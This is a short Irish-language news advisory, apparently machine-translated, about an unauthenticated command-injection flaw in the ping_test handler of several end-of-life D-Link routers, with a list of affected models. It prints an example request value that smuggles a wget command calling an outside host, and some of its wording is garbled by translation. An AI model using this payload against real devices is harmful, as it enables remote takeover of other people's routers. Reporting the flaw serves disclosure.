I ródairí gan sreang D-Link leochaileacht chontúirteach (), a ligeann duit cód a fhorghníomhú go cianda ar thaobh an fheiste trí iarratas speisialta a sheoladh chuig an láimhseálaí “ping_test”, inrochtana gan fíordheimhniú.
Suimiúil go leor, de réir na bhforbróirí firmware, níor cheart an glao “ping_test” a fhorghníomhú ach amháin tar éis fíordheimhnithe, ach i ndáiríre tugtar é ar aon nós, beag beann ar logáil isteach sa chomhéadan gréasáin. Go háirithe, nuair a bhíonn tú ag rochtain ar an script app_sec.cgi agus ag dul thar an bparaiméadar “action=ping_test”, atreoraíonn an script chuig an leathanach fíordheimhnithe, ach déanann sé an gníomh a bhaineann le ping_test ag an am céanna. Chun an cód a fhorghníomhú, baineadh úsáid as leochaileacht eile i ping_test féin, a ghlaonn an áirgiúlacht ping gan seiceáil i gceart ar cheart an seoladh IP a seoladh le haghaidh tástála. Mar shampla, chun an fóntais wget a ghlaoch agus torthaí an ordaithe “macalla 1234” a aistriú chuig óstach seachtrach, ní gá ach an paraiméadar a shonrú “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( macalla 1234)".
Deimhníodh láithreacht na leochaileachta go hoifigiúil sna samhlacha seo a leanas:
- DIR-655 le firmware 3.02b05 nó níos sine;
- DIR-866L le firmware 1.03b04 nó níos sine;
- DIR-1565 le firmware 1.01 nó níos sine;
- DIR-652 (níl aon fhaisnéis faoi leaganacha firmware fadhbacha ar fáil)
Tá an tréimhse tacaíochta do na samhlacha seo imithe in éag cheana féin, mar sin D-Link , nach scaoilfidh nuashonruithe dóibh chun deireadh a chur leis an leochaileacht, ní mholtar iad a úsáid agus molann sé feistí nua a chur ina n-ionad. Mar réiteach slándála, is féidir leat rochtain ar an gcomhéadan gréasáin a theorannú chuig seoltaí IP iontaofa amháin.
Fuarthas amach ina dhiaidh sin go raibh an leochaileacht freisin samhlacha DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 agus DIR-825, pleananna chun nuashonruithe a scaoileadh nach bhfuil ar eolas fós.
Foinse: oscailtenet.ru